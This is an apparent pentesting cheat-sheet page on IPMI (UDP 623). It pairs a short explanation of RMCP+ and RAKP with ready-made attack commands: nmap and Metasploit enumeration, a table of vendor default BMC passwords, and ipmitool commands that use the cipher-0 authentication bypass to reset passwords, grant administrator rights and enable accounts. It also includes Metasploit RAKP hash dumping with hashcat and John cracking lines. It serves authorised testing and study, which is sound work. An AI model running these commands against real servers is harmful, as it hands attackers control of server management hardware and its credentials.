623 - IPMI

PRIMARY CATEGORY → PROTOCOLS AND SERVICES

REFERENCES
Pentesting Guide to IPMI	See here

IPMI → Intelligent Platform Management Interface

Protocols

RMCP+

Remote Management Control Protocol

It is used as a basis for communication in IPMI 2.0

It defines how IPMI messages are transmited between a remote client and the BMC, facilitating hardware management and monitoring

RAKP

Remote Access Key Protocol

This protocol is used for authentication in IPMI 2.0

It authenticates users trying to access the BMC and stablishes a secure connection

Ports

UDP

623

This port is used for IPMI-based remote management via RMCP and RMCP+

The client sent messages to the BMC using RMCP/RMCP+ in order to manage or monitor the hardware

Enumeration

Extract IPMI Version

Nmap

nmap -p623 -sU --script ipmi-version -T5 -n -Pn --disable-arp-ping <TARGET>

Metasploit

Metasploit Module → auxiliary/scanner/ipmi/ipmi_version

msfconsole
> use auxiliary/scanner/ipmi/ipmi_version
> set RHOSTS <TARGET>
> run

Default Credentials

Product	Username	Password
HP iLO	`Administrator`	Randomized 8 Chars String
DELL iDRAC	`root`	`calvin`
IBM IMM	`USERID`	`PASSW0RD`
Fujitsu IRMC	`admin`	`admin`
Supermicro IPMI	`ADMIN`	`ADMIN`
Oracle ILOM	`root`	`changeme`
ASUS iKVM BMC	`admin`	`admin`

IPMI Auth Bypass Via Cipher 0

Enumeration

Nmap

nmap -p623 -sU --script ipmi-cipher-zero -T5 -n -Pn --disable-arp-ping <TARGET>

Metasploit

msfconsole
> use auxiliary/scanner/ipmi/ipmi_cipher_zero 
> set RHOSTS <TARGET>
> run

Exploitation

IPMITool

List all Existing Users in the Remote System

ipmitool -I lanplus -C 0 -H <TARGET> -U <USERNAME> -P <PASSWORD> user list

-C 0 → Without Additional Cipher

Change a User Name with a Specific ID

ipmitool -I lanplus -C 0 -H <TARGET> -U <USERNAME> -P <PASSWORD> user set name <USER_ID> <USERNAME>

Change a User’s Password with a Specific ID

ipmitool -I lanplus -C 0 -H <TARGET> -U <USERNAME> -P <PASSWORD> user set password <USER_ID> <PASSWORD>

Grant Administrator Privileges to the User with a Specific ID

ipmitool -I lanplus -C 0 -H <TARGET> -U <USERNAME> -P <PASSWORD> user priv <USER_ID> <4>

4 → Administrator Privilege Level

Level	Privilege
`1`	No Access
`2`	User
`3`	Operator
`4`	Administrator

Enable a User with a Specific ID

ipmitool -I lanplus -C 0 -H <TARGET> -U <USERNAME> -P <PASSWORD> user enable <USER_ID>

IPMI 2.0 RAKP Auth Remote Password Hash Retrieval

Extracting Hashes

Metasploit

msfconsole
> use auxiliary/scanner/ipmi/ipmi_dumphashes
> set RHOSTS <TARGET>
> set OUTPUT_JOHN_FILE <OUTPUT_FILE>
> set OUTPUT_HASHCAT_FILE <OUTPUT_FILE>
> run

Cracking Hashes

Hashcat

hashcat --hash-type 7300 --attack-mode 0 --force -O --outfile <FILE> <HASH_FILE> <DICTIONARY>

John

john <HASH_FILE> --wordlist <WORDLIST> --format=rakp

💥Cyb3rBook

Explorer

623 - IPMI

PRIMARY CATEGORY → PROTOCOLS AND SERVICES

Protocols

RMCP+

RAKP

Ports

Enumeration

Extract IPMI Version

Nmap

Metasploit

Default Credentials

IPMI Auth Bypass Via Cipher 0

Enumeration

Nmap

Metasploit

Exploitation

IPMITool

IPMI 2.0 RAKP Auth Remote Password Hash Retrieval

Extracting Hashes

Metasploit

Cracking Hashes

Hashcat

John

Graph View

Table of Contents

Backlinks